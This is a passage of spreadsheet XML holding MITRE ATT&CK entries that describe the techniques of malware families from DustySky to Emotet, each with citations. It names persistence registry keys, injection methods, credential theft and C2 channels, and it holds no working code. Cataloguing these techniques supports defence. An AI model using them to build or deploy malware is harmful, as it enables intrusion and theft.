    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for removable media and duplicates itself onto it.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) checks for the existence of anti-virus.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) extracts basic information about the operating system.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has used both HTTP and HTTPS for C2.(Citation: DustySky)</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) injects into other processes to load modules.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has a command to download and executes additional files.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)  </t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) registers itself as a service by adding several Registry keys.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can delete log files generated from the malware stored at &lt;code&gt;C:\windows\temp\tmp0207&lt;/code&gt;.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture and store keystrokes.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has stored keystrokes and screenshots within the &lt;code&gt;%temp%\GoogleChrome&lt;/code&gt;, &lt;code&gt;%temp%\Downloads&lt;/code&gt;, and &lt;code&gt;%temp%\TrendMicroUpdate&lt;/code&gt; directories.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has encrypted strings with RC4.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture screenshots and store them locally.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can use [cmd](https://attack.mitre.org/software/S0106) to execute commands on a victim’s machine.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing directory listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing process listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can upload files over the C2 channel from the infected host.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has a function called "DeleteLeftovers" to remove certain artifacts of the attack.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can download and upload files to the victim's computer.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can make modifications to the Regsitry for persistence.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used a one-way communication method via GitLab and Digital Point to perform C2.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can achieve persistence through the Registry Run key.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can run a remote scriptlet that drops a file and executes it via regsvr32.exe.(Citation: ESET EvilNum July 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can execute commands and scripts through rundll32.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can search for anti-virus products on the system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can harvest cookies and upload them to the C2 server.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the computer name from the victim's system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the username from the victim's machine.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has changed the creation date of files.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can automatically exfiltrate gathered SSH credentials.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has installed a self-signed RPM package mimicking the original system package on RPM based systems.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used DNS requests over UDP port 53 for C2.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can disable SELinux Role-Based Access Control and deactivate PAM modules.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used a DGA to generate a domain name for C2.(Citation: ESET Ebury Feb 2014)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can exfiltrate SSH credentials through custom DNS queries.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) can list directory entries.(Citation: ESET Ebury Oct 2017) </t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can hook logging functions so that nothing from the backdoor gets sent to the logging facility.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can intercept private keys using a trojanized &lt;code&gt;ssh-add&lt;/code&gt; function.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has obfuscated its strings with a simple XOR encryption with a static key.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can deactivate PAM modules to tamper with the sshd configuration.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has intercepted unencrypted private keys as well as private key pass-phrases.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used Python to implement its DGA.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has encoded C2 traffic in hexadecimal format.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used BITSadmin to download and execute malicious DLLs.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used DLL side-loading to execute its payload.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can collect any files found in the enumerated drivers before sending it to its C2 channel.(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has been decrypted before execution.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has disabled Windows Defender to evade protections.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can conduct Active Directory reconnaissance using tools such as Sharphound or [AdFind](https://attack.mitre.org/software/S0552).(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can modify the GPO to evade detection.(Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has the ability to download files from its C2 server.(Citation: Cybereason Egregor Nov 2020)(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has masqueraded the svchost.exe process to exfiltrate data.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used the Windows API to make detection more difficult.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used an encoded PowerShell command by a service created by [Cobalt Strike](https://attack.mitre.org/software/S0154) for lateral movement.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can inject its payload into iexplore.exe process.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used regsvr32.exe to execute malicious DLLs.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has checked for the LogMein event log in an attempt to encrypt files in remote machines.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554)'s payloads are custom-packed, archived and encrypted to prevent analysis.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a language check of the infected system and can query the CPU information (cupid).(Citation: JoeSecurity Egregor 2020)(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can enumerate all connected drives.(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used tools to gather information about users.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) contains functionality to query the local/system time.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a  long sleep (greater than or equal to 3 minutes) to evade detection.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.(Citation: Cyble Egregor Oct 2020)(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used batch files for execution and can launch Internet Explorer from cmd.exe.(Citation: JoeSecurity Egregor 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) injects DLL files into iexplore.exe.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is capable of launching a remote shell on the host to delete itself.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>A variant of [Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;dir C:\progra~1&lt;/code&gt; when initially run.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) can download additional files from the C2 server for execution.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net user&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) creates a file in &lt;code&gt;AppData\Local\Microsoft\Windows\Explorer&lt;/code&gt; and stores all harvested data in that file.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>If installing itself as a service fails, [Elise](https://attack.mitre.org/software/S0081) instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts several of its files, including configuration files.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) enumerates processes via the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>If establishing persistence by installation as a new service fails, one variant of [Elise](https://attack.mitre.org/software/S0081) establishes persistence for the created .exe file by setting the following Registry key: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe&lt;/code&gt;. Other variants have set the following Registry keys for persistence: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : [self]&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD&lt;/code&gt;.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) exfiltrates data using cookie values that are Base64-encoded.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts exfiltrated data with RC4.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;systeminfo&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;ipconfig /all&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net start&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) performs timestomping of a CAB file it creates.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) configures itself as a service.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>A variant of [Emissary](https://attack.mitre.org/software/S0082) appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) injects its DLL file into a newly spawned Internet Explorer process.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to download files from the C2 server.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>The C2 server response to a beacon sent by a variant of [Emissary](https://attack.mitre.org/software/S0082) contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of [Emissary](https://attack.mitre.org/software/S0082) use various XOR operations to encrypt C2 data.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute ver, systeminfo, and gpresult commands.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;ipconfig /all&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net start&lt;/code&gt; to interact with services.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to create a remote shell and execute specified commands.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is capable of configuring itself as a service.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed encrypting the data it collects before sending it to the C2 server. (Citation: Fortinet Emotet May 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) is known to use RSA keys for encrypting C2 traffic. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. (Citation: US-CERT Emotet Jul 2018)(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed injecting in to Explorer.exe and other processes. (Citation: Picus Emotet Dec 2018)(Citation: Trend Micro Banking Malware Jan 2019)(Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation. (Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: Red Canary Emotet Feb 2019) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping password grabber modules including [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) can brute force a local admin password, then use it to facilitate lateral movement.(Citation: Malwarebytes Emotet Dec 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that scrapes email data from Outlook.(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious link delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed to hook network APIs to monitor network traffic. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.(Citation: Talos Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has obfuscated macros within malicious documents to hide the URLs hosting the malware,  CMD.exe arguments, and PowerShell scripts. (Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: ESET Emotet Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed using a hard coded list of passwords to brute force user accounts. (Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: CIS Emotet Dec 2018) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used Powershell to retrieve the malicious payload and download additional resources like [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Symantec Emotet Jul 2018)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Red Canary Emotet Feb 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed enumerating local processes.(Citation: ASEC Emotet 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed adding the downloaded payload to the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key to maintain persistence.(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) leverages the Admin$ share for lateral movement once the local admin password has been brute forced. (Citation: Malwarebytes Emotet Dec 2017) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has maintained persistence through a scheduled task. (Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used custom packers to protect its payloads.(Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing attachments. (Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing links. (Citation: Trend Micro Banking Malware Jan 2019)(Citation: Kaspersky Emotet Jan 2019)(Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Talos Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. (Citation: Symantec Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used cmd.exe to run a PowerShell script. (Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used WMI to execute powershell.exe.(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
